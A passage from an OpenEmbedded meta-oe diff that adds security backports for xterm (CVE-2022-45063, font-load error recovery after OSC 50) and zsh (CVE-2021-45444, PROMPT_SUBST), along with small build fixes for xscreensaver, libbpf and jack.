(xtermOpenFont(xw, *nameOutP, infoOut, False) ++ if (xtermOpenFont(xw, *nameOutP, infoOut, NULL, False) + && is_derived_font_name(*nameOutP) + && EmptyFont(infoOut->fs)) { + xtermCloseFont2(xw, infoOut - fWide, fWide); +@@ -1493,7 +1504,7 @@ loadWBoldFP(XtermWidget xw, + + if (check_fontname(*nameOutP)) { + +- if (xtermOpenFont(xw, *nameOutP, infoOut, False) ++ if (xtermOpenFont(xw, *nameOutP, infoOut, NULL, False) + && is_derived_font_name(*nameOutP) + && !compatibleWideCounts(wideInfoRef->fs, infoOut->fs)) { + xtermCloseFont2(xw, infoOut - fWBold, fWBold); +@@ -1546,6 +1557,10 @@ loadWBoldFP(XtermWidget xw, + } + #endif + ++/* ++ * Load a given bitmap font, along with the bold/wide variants. ++ * Returns nonzero on success. ++ */ + int + xtermLoadFont(XtermWidget xw, + const VTFontNames * fonts, +@@ -1555,33 +1570,37 @@ xtermLoadFont(XtermWidget xw, + TScreen *screen = TScreenOf(xw); + VTwin *win = WhichVWin(screen); + +- VTFontNames myfonts; +- XTermFonts fnts[fMAX]; ++ VTFontNames new_fnames; ++ XTermFonts new_fonts[fMAX]; ++ XTermFonts old_fonts[fMAX]; + char *tmpname = NULL; + Boolean proportional = False; ++ Boolean recovered; ++ int code = 0; + +- memset(&myfonts, 0, sizeof(myfonts)); +- memset(fnts, 0, sizeof(fnts)); ++ memset(&new_fnames, 0, sizeof(new_fnames)); ++ memset(new_fonts, 0, sizeof(new_fonts)); ++ memcpy(&old_fonts, screen->fnts, sizeof(old_fonts)); + + if (fonts != 0) +- myfonts = *fonts; +- if (!check_fontname(myfonts.f_n)) +- return 0; ++ new_fnames = *fonts; ++ if (!check_fontname(new_fnames.f_n)) ++ return code; + + if (fontnum == fontMenu_fontescape +- && myfonts.f_n != screen->MenuFontName(fontnum)) { +- if ((tmpname = x_strdup(myfonts.f_n)) == 0) +- return 0; ++ && new_fnames.f_n != screen->MenuFontName(fontnum)) { ++ if ((tmpname = x_strdup(new_fnames.f_n)) == 0) ++ return code; + } + +- TRACE(("Begin Cgs - xtermLoadFont(%s)\n", myfonts.f_n)); ++ TRACE(("Begin Cgs - xtermLoadFont(%s)\n", new_fnames.f_n)); + releaseWindowGCs(xw, win); + + #define DbgResource(name, field, index) \ + TRACE(("xtermLoadFont #%d "name" %s%s\n", \ + fontnum, \ +- (fnts[index].warn == fwResource) ? "*" : " ", \ +- NonNull(myfonts.field))) ++ (new_fonts[index].warn == fwResource) ? "*" : " ", \ ++ NonNull(new_fnames.field))) + DbgResource("normal", f_n, fNorm); + DbgResource("bold ", f_b, fBold); + #if OPT_WIDE_CHARS +@@ -1590,16 +1609,17 @@ xtermLoadFont(XtermWidget xw, + #endif + + if (!loadNormFP(xw, +- &myfonts.f_n, +- &fnts[fNorm], ++ &new_fnames.f_n, ++ &new_fonts[fNorm], ++ &old_fonts[fNorm], + fontnum)) + goto bad; + + if (!loadBoldFP(xw, +- &myfonts.f_b, +- &fnts[fBold], +- myfonts.f_n, +- &fnts[fNorm], ++ &new_fnames.f_b, ++ &new_fonts[fBold], ++ new_fnames.f_n, ++ &new_fonts[fNorm], + fontnum)) + goto bad; + +@@ -1611,20 +1631,20 @@ xtermLoadFont(XtermWidget xw, + if_OPT_WIDE_CHARS(screen, { + + if (!loadWideFP(xw, +- &myfonts.f_w, +- &fnts[fWide], +- myfonts.f_n, +- &fnts[fNorm], ++ &new_fnames.f_w, ++ &new_fonts[fWide], ++ new_fnames.f_n, ++ &new_fonts[fNorm], + fontnum)) + goto bad; + + if (!loadWBoldFP(xw, +- &myfonts.f_wb, +- &fnts[fWBold], +- myfonts.f_w, +- &fnts[fWide], +- myfonts.f_b, +- &fnts[fBold], ++ &new_fnames.f_wb, ++ &new_fonts[fWBold], ++ new_fnames.f_w, ++ &new_fonts[fWide], ++ new_fnames.f_b, ++ &new_fonts[fBold], + fontnum)) + goto bad; + +@@ -1634,30 +1654,30 @@ xtermLoadFont(XtermWidget xw, + * Normal/bold fonts should be the same width. Also, the min/max + * values should be the same. + */ +- if (fnts[fNorm].fs != 0 +- && fnts[fBold].fs != 0 +- && (!is_fixed_font(fnts[fNorm].fs) +- || !is_fixed_font(fnts[fBold].fs) +- || differing_widths(fnts[fNorm].fs, fnts[fBold].fs))) { ++ if (new_fonts[fNorm].fs != 0 ++ && new_fonts[fBold].fs != 0 ++ && (!is_fixed_font(new_fonts[fNorm].fs) ++ || !is_fixed_font(new_fonts[fBold].fs) ++ || differing_widths(new_fonts[fNorm].fs, new_fonts[fBold].fs))) { + TRACE(("Proportional font! normal %d/%d, bold %d/%d\n", +- fnts[fNorm].fs->min_bounds.width, +- fnts[fNorm].fs->max_bounds.width, +- fnts[fBold].fs->min_bounds.width, +- fnts[fBold].fs->max_bounds.width)); ++ new_fonts[fNorm].fs->min_bounds.width, ++ new_fonts[fNorm].fs->max_bounds.width, ++ new_fonts[fBold].fs->min_bounds.width, ++ new_fonts[fBold].fs->max_bounds.width)); + proportional = True; + } + + if_OPT_WIDE_CHARS(screen, { +- if (fnts[fWide].fs != 0 +- && fnts[fWBold].fs != 0 +- && (!is_fixed_font(fnts[fWide].fs) +- || !is_fixed_font(fnts[fWBold].fs) +- || differing_widths(fnts[fWide].fs, fnts[fWBold].fs))) { ++ if (new_fonts[fWide].fs != 0 ++ && new_fonts[fWBold].fs != 0 ++ && (!is_fixed_font(new_fonts[fWide].fs) ++ || !is_fixed_font(new_fonts[fWBold].fs) ++ || differing_widths(new_fonts[fWide].fs, new_fonts[fWBold].fs))) { + TRACE(("Proportional font! wide %d/%d, wide bold %d/%d\n", +- fnts[fWide].fs->min_bounds.width, +- fnts[fWide].fs->max_bounds.width, +- fnts[fWBold].fs->min_bounds.width, +- fnts[fWBold].fs->max_bounds.width)); ++ new_fonts[fWide].fs->min_bounds.width, ++ new_fonts[fWide].fs->max_bounds.width, ++ new_fonts[fWBold].fs->min_bounds.width, ++ new_fonts[fWBold].fs->max_bounds.width)); + proportional = True; + } + }); +@@ -1676,13 +1696,13 @@ xtermLoadFont(XtermWidget xw, + screen->ifnts_ok = False; + #endif + +- xtermCopyFontInfo(GetNormalFont(screen, fNorm), &fnts[fNorm]); +- xtermCopyFontInfo(GetNormalFont(screen, fBold), &fnts[fBold]); ++ xtermCopyFontInfo(GetNormalFont(screen, fNorm), &new_fonts[fNorm]); ++ xtermCopyFontInfo(GetNormalFont(screen, fBold), &new_fonts[fBold]); + #if OPT_WIDE_CHARS +- xtermCopyFontInfo(GetNormalFont(screen, fWide), &fnts[fWide]); +- if (fnts[fWBold].fs == NULL) +- xtermCopyFontInfo(GetNormalFont(screen, fWide), &fnts[fWide]); +- xtermCopyFontInfo(GetNormalFont(screen, fWBold), &fnts[fWBold]); ++ xtermCopyFontInfo(GetNormalFont(screen, fWide), &new_fonts[fWide]); ++ if (new_fonts[fWBold].fs == NULL) ++ xtermCopyFontInfo(GetNormalFont(screen, fWide), &new_fonts[fWide]); ++ xtermCopyFontInfo(GetNormalFont(screen, fWBold), &new_fonts[fWBold]); + #endif + + xtermUpdateFontGCs(xw, getNormalFont); +@@ -1713,7 +1733,7 @@ xtermLoadFont(XtermWidget xw, + unsigned ch; + + #if OPT_TRACE +-#define TRACE_MISS(index) show_font_misses(#index, &fnts[index]) ++#define TRACE_MISS(index) show_font_misses(#index, &new_fonts[index]) + TRACE_MISS(fNorm); + TRACE_MISS(fBold); + #if OPT_WIDE_CHARS +@@ -1730,8 +1750,8 @@ xtermLoadFont(XtermWidget xw, + if ((n != UCS_REPL) + && (n != ch) + && (screen->fnt_boxes & 2)) { +- if (xtermMissingChar(n, &fnts[fNorm]) || +- xtermMissingChar(n, &fnts[fBold])) { ++ if (xtermMissingChar(n, &new_fonts[fNorm]) || ++ xtermMissingChar(n, &new_fonts[fBold])) { + UIntClr(screen->fnt_boxes, 2); + TRACE(("missing graphics character #%d, U+%04X\n", + ch, n)); +@@ -1743,12 +1763,12 @@ xtermLoadFont(XtermWidget xw, + #endif + + for (ch = 1; ch < 32; ch++) { +- if (xtermMissingChar(ch, &fnts[fNorm])) { ++ if (xtermMissingChar(ch, &new_fonts[fNorm])) { + TRACE(("missing normal char #%d\n", ch)); + UIntClr(screen->fnt_boxes, 1); + break; + } +- if (xtermMissingChar(ch, &fnts[fBold])) { ++ if (xtermMissingChar(ch, &new_fonts[fBold])) { + TRACE(("missing bold char #%d\n", ch)); + UIntClr(screen->fnt_boxes, 1); + break; +@@ -1765,8 +1785,8 @@ xtermLoadFont(XtermWidget xw, + screen->enbolden = screen->bold_mode; + } else { + screen->enbolden = screen->bold_mode +- && ((fnts[fNorm].fs == fnts[fBold].fs) +- || same_font_name(myfonts.f_n, myfonts.f_b)); ++ && ((new_fonts[fNorm].fs == new_fonts[fBold].fs) ++ || same_font_name(new_fnames.f_n, new_fnames.f_b)); + } + TRACE(("Will %suse 1-pixel offset/overstrike to simulate bold\n", + screen->enbolden ? "" : "not ")); +@@ -1782,7 +1802,7 @@ xtermLoadFont(XtermWidget xw, + update_font_escape(); + } + #if OPT_SHIFT_FONTS +- screen->menu_font_sizes[fontnum] = FontSize(fnts[fNorm].fs); ++ screen->menu_font_sizes[fontnum] = FontSize(new_fonts[fNorm].fs); + #endif + } + set_cursor_gcs(xw); +@@ -1797,20 +1817,21 @@ xtermLoadFont(XtermWidget xw, + FREE_FNAME(f_w); + FREE_FNAME(f_wb); + #endif +- if (fnts[fNorm].fn == fnts[fBold].fn) { +- free(fnts[fNorm].fn); ++ if (new_fonts[fNorm].fn == new_fonts[fBold].fn) { ++ free(new_fonts[fNorm].fn); + } else { +- free(fnts[fNorm].fn); +- free(fnts[fBold].fn); ++ free(new_fonts[fNorm].fn); ++ free(new_fonts[fBold].fn); + } + #if OPT_WIDE_CHARS +- free(fnts[fWide].fn); +- free(fnts[fWBold].fn); ++ free(new_fonts[fWide].fn); ++ free(new_fonts[fWBold].fn); + #endif + xtermSetWinSize(xw); + return 1; + + bad: ++ recovered = False; + free(tmpname); + + #if OPT_RENDERFONT +@@ -1820,15 +1841,15 @@ xtermLoadFont(XtermWidget xw, + SetItemSensitivity(fontMenuEntries[fontnum].widget, True); + #endif + Bell(xw, XkbBI_MinorError, 0); +- myfonts.f_n = screen->MenuFontName(old_fontnum); +- return xtermLoadFont(xw, &myfonts, doresize, old_fontnum); +- } else if (x_strcasecmp(myfonts.f_n, DEFFONT)) { +- int code; +- +- myfonts.f_n = x_strdup(DEFFONT); +- TRACE(("...recovering for TrueType fonts\n")); +- code = xtermLoadFont(xw, &myfonts, doresize, fontnum); +- if (code) { ++ new_fnames.f_n = screen->MenuFontName(old_fontnum); ++ if (xtermLoadFont(xw, &new_fnames, doresize, old_fontnum)) ++ recovered = True; ++ } else if (x_strcasecmp(new_fnames.f_n, DEFFONT) ++ && x_strcasecmp(new_fnames.f_n, old_fonts[fNorm].fn)) { ++ new_fnames.f_n = x_strdup(old_fonts[fNorm].fn); ++ TRACE(("...recovering from failed font-load\n")); ++ if (xtermLoadFont(xw, &new_fnames, doresize, fontnum)) { ++ recovered = True; + if (fontnum != fontMenu_fontsel) { + SetItemSensitivity(fontMenuEntries[fontnum].widget, + UsingRenderFont(xw)); +@@ -1837,15 +1858,15 @@ xtermLoadFont(XtermWidget xw, + FontHeight(screen), + FontWidth(screen))); + } +- return code; + } + #endif +- +- releaseWindowGCs(xw, win); +- +- xtermCloseFonts(xw, fnts); +- TRACE(("Fail Cgs - xtermLoadFont\n")); +- return 0; ++ if (!recovered) { ++ releaseWindowGCs(xw, win); ++ xtermCloseFonts(xw, new_fonts); ++ TRACE(("Fail Cgs - xtermLoadFont\n")); ++ code = 0; ++ } ++ return code; + } + + #if OPT_WIDE_ATTRS +@@ -1893,7 +1914,7 @@ xtermLoadItalics(XtermWidget xw) + } else { + xtermOpenFont(xw, + getNormalFont(screen, n)->fn, +- data, False); ++ data, NULL, False); + } + } + } +@@ -4250,6 +4271,8 @@ findXftGlyph(XtermWidget xw, XftFont *given, unsigned wc) + } + #endif + if (foundXftGlyph(xw, check, wc)) { ++ (void) added; ++ (void) actual; + markXftOpened(xw, which, n, wc); + reportXftFonts(xw, check, "fallback", tag, myReport); + result = check; +@@ -4451,7 +4474,7 @@ lookupOneFontSize(XtermWidget xw, int fontnum) + + memset(&fnt, 0, sizeof(fnt)); + screen->menu_font_sizes[fontnum] = -1; +- if (xtermOpenFont(xw, screen->MenuFontName(fontnum), &fnt, True)) { ++ if (xtermOpenFont(xw, screen->MenuFontName(fontnum), &fnt, NULL, True)) { + if (fontnum <= fontMenu_lastBuiltin + || strcmp(fnt.fn, DEFFONT)) { + screen->menu_font_sizes[fontnum] = FontSize(fnt.fs); +@@ -4864,13 +4887,14 @@ HandleSetFont(Widget w, + } + } + +-void ++Bool + SetVTFont(XtermWidget xw, + int which, + Bool doresize, + const VTFontNames * fonts) + { + TScreen *screen = TScreenOf(xw); ++ Bool result = False; + + TRACE(("SetVTFont(which=%d, f_n=%s, f_b=%s)\n", which, + (fonts && fonts->f_n) ? fonts->f_n : "<null>", +@@ -4879,34 +4903,31 @@ SetVTFont(XtermWidget xw, + if (IsIcon(screen)) { + Bell(xw, XkbBI_MinorError, 0); + } else if (which >= 0 && which < NMENUFONTS) { +- VTFontNames myfonts; ++ VTFontNames new_fnames; + +- memset(&myfonts, 0, sizeof(myfonts)); ++ memset(&new_fnames, 0, sizeof(new_fnames)); + if (fonts != 0) +- myfonts = *fonts; ++ new_fnames = *fonts; + + if (which == fontMenu_fontsel) { /* go get the selection */ +- FindFontSelection(xw, myfonts.f_n, False); ++ result = FindFontSelection(xw, new_fnames.f_n, False); + } else { +- int oldFont = screen->menu_font_number; +- + #define USE_CACHED(field, name) \ +- if (myfonts.field == 0) { \ +- myfonts.field = x_strdup(screen->menu_font_names[which][name]); \ +- TRACE(("set myfonts." #field " from menu_font_names[%d][" #name "] %s\n", \ +- which, NonNull(myfonts.field))); \ ++ if (new_fnames.field == NULL) { \ ++ new_fnames.field = x_strdup(screen->menu_font_names[which][name]); \ ++ TRACE(("set new_fnames." #field " from menu_font_names[%d][" #name "] %s\n", \ ++ which, NonNull(new_fnames.field))); \ + } else { \ +- TRACE(("set myfonts." #field " reused\n")); \ ++ TRACE(("set new_fnames." #field " reused\n")); \ + } + #define SAVE_FNAME(field, name) \ +- if (myfonts.field != 0) { \ +- if (screen->menu_font_names[which][name] == 0 \ +- || strcmp(screen->menu_font_names[which][name], myfonts.field)) { \ +- TRACE(("updating menu_font_names[%d][" #name "] to \"%s\"\n", \ +- which, myfonts.field)); \ +- FREE_STRING(screen->menu_font_names[which][name]); \ +- screen->menu_font_names[which][name] = x_strdup(myfonts.field); \ +- } \ ++ if (new_fnames.field != NULL \ ++ && (screen->menu_font_names[which][name] == NULL \ ++ || strcmp(screen->menu_font_names[which][name], new_fnames.field))) { \ ++ TRACE(("updating menu_font_names[%d][" #name "] to \"%s\"\n", \ ++ which, new_fnames.field)); \ ++ FREE_STRING(screen->menu_font_names[which][name]); \ ++ screen->menu_font_names[which][name] = x_strdup(new_fnames.field); \ + } + + USE_CACHED(f_n, fNorm); +@@ -4916,7 +4937,7 @@ SetVTFont(XtermWidget xw, + USE_CACHED(f_wb, fWBold); + #endif + if (xtermLoadFont(xw, +- &myfonts, ++ &new_fnames, + doresize, which)) { + /* + * If successful, save the data so that a subsequent query via +@@ -4928,10 +4949,8 @@ SetVTFont(XtermWidget xw, + SAVE_FNAME(f_w, fWide); + SAVE_FNAME(f_wb, fWBold); + #endif ++ result = True; + } else { +- (void) xtermLoadFont(xw, +- xtermFontName(screen->MenuFontName(oldFont)), +- doresize, oldFont); + Bell(xw, XkbBI_MinorError, 0); + } + FREE_FNAME(f_n); +@@ -4944,7 +4963,8 @@ SetVTFont(XtermWidget xw, + } else { + Bell(xw, XkbBI_MinorError, 0); + } +- return; ++ TRACE(("...SetVTFont: %d\n", result)); ++ return result; + } + + #if OPT_RENDERFONT +diff --git a/fontutils.h b/fontutils.h +index 2267f24..5b3afe0 100644 +--- a/fontutils.h ++++ b/fontutils.h +@@ -37,7 +37,7 @@ + /* *INDENT-OFF* */ + + extern Bool xtermLoadDefaultFonts (XtermWidget /* xw */); +-extern Bool xtermOpenFont (XtermWidget /* xw */, const char */* name */, XTermFonts * /* result */, Bool /* force */); ++extern Bool xtermOpenFont (XtermWidget /* xw */, const char */* name */, XTermFonts * /* result */, XTermFonts * /* current */, Bool /* force */); + extern XFontStruct * xtermLoadQueryFont(XtermWidget /* xw */, const char * /*name */); + extern XTermFonts * getDoubleFont (TScreen * /* screen */, int /* which */); + extern XTermFonts * getItalicFont (TScreen * /* screen */, int /* which */); +@@ -51,7 +51,7 @@ extern int lookupRelativeFontSize (XtermWidget /* xw */, int /* old */, int /* r + extern int xtermGetFont (const char * /* param */); + extern int xtermLoadFont (XtermWidget /* xw */, const VTFontNames */* fonts */, Bool /* doresize */, int /* fontnum */); + extern void HandleSetFont PROTO_XT_ACTIONS_ARGS; +-extern void SetVTFont (XtermWidget /* xw */, int /* i */, Bool /* doresize */, const VTFontNames */* fonts */); ++extern Bool SetVTFont (XtermWidget /* xw */, int /* i */, Bool /* doresize */, const VTFontNames */* fonts */); + extern void allocFontList (XtermWidget /* xw */, const char * /* name */, XtermFontNames * /* target */, VTFontEnum /* which */, const char * /* source */, Bool /* ttf */); + extern void copyFontList (char *** /* targetp */, char ** /* source */); + extern void initFontLists (XtermWidget /* xw */); +diff --git a/misc.c b/misc.c +index cbb2679..aafbb08 100644 +--- a/misc.c ++++ b/misc.c +@@ -3941,9 +3941,9 @@ ChangeFontRequest(XtermWidget xw, String buf) + { + memset(&fonts, 0, sizeof(fonts)); + fonts.f_n = name; +- SetVTFont(xw, num, True, &fonts); +- if (num == screen->menu_font_number && +- num != fontMenu_fontescape) { ++ if (SetVTFont(xw, num, True, &fonts) ++ && num == screen->menu_font_number ++ && num != fontMenu_fontescape) { + screen->EscapeFontName() = x_strdup(name); + } + } +@@ -6422,7 +6422,6 @@ xtermSetenv(const char *var, const char *value) + + found = envindex; + environ[found + 1] = NULL; +- environ = environ; + } + + environ[found] = malloc(2 + len + strlen(value)); +diff --git a/screen.c b/screen.c +index 93e36b3..f82ee44 100644 +--- a/screen.c ++++ b/screen.c +@@ -1454,7 +1454,7 @@ ScrnRefresh(XtermWidget xw, + maxrow += StatusLineRows; + } + #endif +- ++ (void) recurse; + ++recurse; + + if (screen->cursorp.col >= leftcol +diff --git a/xterm.h b/xterm.h +index e6bd123..c4fe811 100644 +--- a/xterm.h ++++ b/xterm.h +@@ -999,7 +999,7 @@ extern Bool CheckBufPtrs (TScreen * /* screen */); + extern Bool set_cursor_gcs (XtermWidget /* xw */); + extern char * vt100ResourceToString (XtermWidget /* xw */, const char * /* name */); + extern int VTInit (XtermWidget /* xw */); +-extern void FindFontSelection (XtermWidget /* xw */, const char * /* atom_name */, Bool /* justprobe */); ++extern Bool FindFontSelection (XtermWidget /* xw */, const char * /* atom_name */, Bool /* justprobe */); + extern void HideCursor (XtermWidget /* xw */); + extern void RestartBlinking(XtermWidget /* xw */); + extern void ShowCursor (XtermWidget /* xw */); +diff --git a/xterm.log.html b/xterm.log.html +index 03324b1..0f28658 100644 +--- a/xterm.log.html ++++ b/xterm.log.html +@@ -1026,6 +1026,12 @@ + 2022/03/09</a></h1> + + <ul> ++ <li>improve error-recovery when setting a bitmap font for the ++ VT100 window, e.g., in case <em>OSC 50</em> failed, ++ restoring the most recent valid font so that a subsequent ++ <em>OSC 50</em> reports this correctly (report by David ++ Leadbeater).</li> ++ + <li>amend allocation/freeing of scrollback lines, eliminating + an adjustment for status-line added in <a href= + "#xterm_371">patch #371</a> (report/testcase by Rajeev V. +-- +2.25.1 + diff --git a/meta-oe/recipes-graphics/xorg-app/xterm_372.bb b/meta-oe/recipes-graphics/xorg-app/xterm_372.bb index 3e1e9d7042..223bc0a498 100644 --- a/meta-oe/recipes-graphics/xorg-app/xterm_372.bb +++ b/meta-oe/recipes-graphics/xorg-app/xterm_372.bb @@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://xterm.h;beginline=3;endline=31;md5=5ec6748ed90e588caa SRC_URI = "http://invisible-mirror.net/archives/${BPN}/${BP}.tgz \ file://0001-Add-configure-time-check-for-setsid.patch \ + file://CVE-2022-45063.patch \ " SRC_URI[sha256sum] = "c6d08127cb2409c3a04bcae559b7025196ed770bb7bf26630abcb45d95f60ab1" diff --git a/meta-oe/recipes-graphics/xscreensaver/xscreensaver_6.01.bb b/meta-oe/recipes-graphics/xscreensaver/xscreensaver_6.01.bb index 2ab5297949..a5271f08bd 100644 --- a/meta-oe/recipes-graphics/xscreensaver/xscreensaver_6.01.bb +++ b/meta-oe/recipes-graphics/xscreensaver/xscreensaver_6.01.bb @@ -6,6 +6,8 @@ LIC_FILES_CHKSUM = "file://driver/xscreensaver.h;endline=10;md5=c3ce41cdff745eb1 SRC_URI = "https://www.jwz.org/${BPN}/${BP}.tar.gz" SRC_URI[sha256sum] = "085484665d91f60b4a1dedacd94bcf9b74b0fb096bcedc89ff1c245168e5473b" +MIRRORS += "https://www.jwz.org/${BPN} https://ftp.osuosl.org/pub/blfs/conglomeration/${BPN}" + SRC_URI += " \ file://xscreensaver.service \ file://0001-build-Do-not-build-po-files.patch \ diff --git a/meta-oe/recipes-kernel/libbpf/libbpf_0.7.0.bb b/meta-oe/recipes-kernel/libbpf/libbpf_0.7.0.bb index 461e6b05ed..5f687b27b3 100644 --- a/meta-oe/recipes-kernel/libbpf/libbpf_0.7.0.bb +++ b/meta-oe/recipes-kernel/libbpf/libbpf_0.7.0.bb @@ -17,6 +17,7 @@ COMPATIBLE_HOST = "(x86_64|i.86|aarch64|riscv64|powerpc64).*-linux" S = "${WORKDIR}/git/src" EXTRA_OEMAKE += "DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir}" +EXTRA_OEMAKE:append:class-native = " UAPIDIR=${includedir}" inherit pkgconfig @@ -27,3 +28,9 @@ do_compile() { do_install() { oe_runmake install } + +do_install:append:class-native() { + oe_runmake install_uapi_headers +} + +BBCLASSEXTEND = "native nativesdk" diff --git a/meta-oe/recipes-multimedia/jack/jack/0001-Remove-usage-of-U-mode-bit-for-opening-files-in-pyth.patch b/meta-oe/recipes-multimedia/jack/jack/0001-Remove-usage-of-U-mode-bit-for-opening-files-in-pyth.patch new file mode 100644 index 0000000000..d3b203111f --- /dev/null +++ b/meta-oe/recipes-multimedia/jack/jack/0001-Remove-usage-of-U-mode-bit-for-opening-files-in-pyth.patch @@ -0,0 +1,52 @@ +From 415d50fc56b82963e5570c7738c61b22f4a83748 Mon Sep 17 00:00:00 2001 +From: Daan De Meyer <daan.j.demeyer@gmail.com> +Date: Mon, 11 Jul 2022 00:56:28 +0200 +Subject: [PATCH] Remove usage of 'U' mode bit for opening files in python + +The 'U' mode bit is removed in python 3.11. It has been +deprecated for a long time. The 'U' mode bit has no effect +so this change doesn't change any behavior. + +See https://docs.python.org/3.11/whatsnew/3.11.html#changes-in-the-python-api + +Upstream-Status: Submitted [https://github.com/jackaudio/jack2/pull/884] +--- + waflib/ConfigSet.py | 2 +- + waflib/Context.py | 4 ++-- + 2 files changed, 3 insertions(+), 3 deletions(-) + +diff --git a/waflib/ConfigSet.py b/waflib/ConfigSet.py +index b300bb56..84736c9c 100644 +--- a/waflib/ConfigSet.py ++++ b/waflib/ConfigSet.py +@@ -312,7 +312,7 @@ class ConfigSet(object): + :type filename: string + """ + tbl = self.table +- code = Utils.readf(filename, m='rU') ++ code = Utils.readf(filename, m='r') + for m in re_imp.finditer(code): + g = m.group + tbl[g(2)] = eval(g(3)) +diff --git a/waflib/Context.py b/waflib/Context.py +index 9fee3fa1..761b521f 100644 +--- a/waflib/Context.py ++++ b/waflib/Context.py +@@ -266,7 +266,7 @@ class Context(ctx): + cache[node] = True + self.pre_recurse(node) + try: +- function_code = node.read('rU', encoding) ++ function_code = node.read('r', encoding) + exec(compile(function_code, node.abspath(), 'exec'), self.exec_dict) + finally: + self.post_recurse(node) +@@ -662,7 +662,7 @@ def load_module(path, encoding=None): + + module = imp.new_module(WSCRIPT_FILE) + try: +- code = Utils.readf(path, m='rU', encoding=encoding) ++ code = Utils.readf(path, m='r', encoding=encoding) + except EnvironmentError: + raise Errors.WafError('Could not read the file %r' % path) + diff --git a/meta-oe/recipes-multimedia/jack/jack_1.19.20.bb b/meta-oe/recipes-multimedia/jack/jack_1.19.20.bb index 452f066559..ea8c0f385a 100644 --- a/meta-oe/recipes-multimedia/jack/jack_1.19.20.bb +++ b/meta-oe/recipes-multimedia/jack/jack_1.19.20.bb @@ -14,7 +14,9 @@ LIC_FILES_CHKSUM = " \ DEPENDS = "libsamplerate0 libsndfile1 readline" -SRC_URI = "git://github.com/jackaudio/jack2.git;branch=master;protocol=https" +SRC_URI = "git://github.com/jackaudio/jack2.git;branch=master;protocol=https \ + file://0001-Remove-usage-of-U-mode-bit-for-opening-files-in-pyth.patch \ +" SRCREV = "a2fe7ec2fdbd315f112c8035282d94a429451178" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_1.patch b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_1.patch new file mode 100644 index 0000000000..fb8fa3427f --- /dev/null +++ b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_1.patch @@ -0,0 +1,60 @@ +Origin: commit c187154f47697cdbf822c2f9d714d570ed4a0fd1 +From: Oliver Kiddle <opk@zsh.org> +Date: Wed, 15 Dec 2021 01:56:40 +0100 +Subject: [PATCH 1/9] security/41: Don't perform PROMPT_SUBST evaluation on + %F/%K arguments + +Mitigates CVE-2021-45444 + +https://salsa.debian.org/debian/zsh/-/raw/debian/5.8-6+deb11u1/debian/patches/cherry-pick-CVE-2021-45444_1.patch?inline=false +Upstream-Status: Backport +CVE: CVE-2021-45444 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> +--- + ChangeLog | 5 +++++ + Src/prompt.c | 10 ++++++++++ + 2 files changed, 15 insertions(+) + +diff --git a/ChangeLog b/ChangeLog +index 8d7dfc169..eb248ec06 100644 +--- a/ChangeLog ++++ b/ChangeLog +@@ -1,3 +1,8 @@ ++2022-01-27 dana <dana@dana.is> ++ ++ * Oliver Kiddle: security/41: Src/prompt.c: Prevent recursive ++ PROMPT_SUBST ++ + 2020-02-14 dana <dana@dana.is> + + * unposted: Config/version.mk: Update for 5.8 +diff --git a/Src/prompt.c b/Src/prompt.c +index b65bfb86b..91e21c8e9 100644 +--- a/Src/prompt.c ++++ b/Src/prompt.c +@@ -244,6 +244,12 @@ parsecolorchar(zattr arg, int is_fg) + bv->fm += 2; /* skip over F{ */ + if ((ep = strchr(bv->fm, '}'))) { + char oc = *ep, *col, *coll; ++ int ops = opts[PROMPTSUBST], opb = opts[PROMPTBANG]; ++ int opp = opts[PROMPTPERCENT]; ++ ++ opts[PROMPTPERCENT] = 1; ++ opts[PROMPTSUBST] = opts[PROMPTBANG] = 0; ++ + *ep = '\0'; + /* expand the contents of the argument so you can use + * %v for example */ +@@ -252,6 +258,10 @@ parsecolorchar(zattr arg, int is_fg) + arg = match_colour((const char **)&coll, is_fg, 0); + free(col); + bv->fm = ep; ++ ++ opts[PROMPTSUBST] = ops; ++ opts[PROMPTBANG] = opb; ++ opts[PROMPTPERCENT] = opp; + } else { + arg = match_colour((const char **)&bv->fm, is_fg, 0); + if (*bv->fm != '}') +-- +2.34.1 diff --git a/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_2.patch b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_2.patch new file mode 100644 index 0000000000..e5b6d7cdc9 --- /dev/null +++ b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_2.patch @@ -0,0 +1,140 @@ +From 8a4d65ef6d0023ab9b238529410afb433553d2fa Mon Sep 17 00:00:00 2001 +From: Marc Cornellà <hello@mcornella.com> +Date: Mon, 24 Jan 2022 09:43:28 +0100 +Subject: [PATCH 2/9] security/89: Add patch which can optionally be used to + work around CVE-2021-45444 in VCS_Info +Comment: Updated to use the same file name without blanks as actually + used in the final 5.8.1 release. + + +https://salsa.debian.org/debian/zsh/-/blob/debian/5.8-6+deb11u1/debian/patches/cherry-pick-CVE-2021-45444_2.patch +Upstream-Status: Backport +CVE: CVE-2021-45444 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> +--- + ChangeLog | 5 + + Etc/CVE-2021-45444-VCS_Info-workaround.patch | 98 ++++++++++++++++++++ + 2 files changed, 103 insertions(+) + create mode 100644 Etc/CVE-2021-45444-VCS_Info-workaround.patch + +diff --git a/ChangeLog b/ChangeLog +index eb248ec06..9a05a09e1 100644 +--- a/ChangeLog ++++ b/ChangeLog +@@ -1,5 +1,10 @@ + 2022-01-27 dana <dana@dana.is> + ++ * Marc Cornellà: security/89: ++ Etc/CVE-2021-45444-VCS_Info-workaround.patch: Add patch which ++ can optionally be used to work around recursive PROMPT_SUBST ++ issue in VCS_Info ++ + * Oliver Kiddle: security/41: Src/prompt.c: Prevent recursive + PROMPT_SUBST + +diff --git a/Etc/CVE-2021-45444-VCS_Info-workaround.patch b/Etc/CVE-2021-45444-VCS_Info-workaround.patch +new file mode 100644 +index 000000000..13e54be77 +--- /dev/null ++++ b/Etc/CVE-2021-45444-VCS_Info-workaround.patch +@@ -0,0 +1,98 @@ ++From 972887bbe5eb6a00e5f0e73781d6d73bfdcafb93 Mon Sep 17 00:00:00 2001 ++From: =?UTF-8?q?Marc=20Cornell=C3=A0?= <hello@mcornella.com> ++Date: Mon, 24 Jan 2022 09:43:28 +0100 ++Subject: 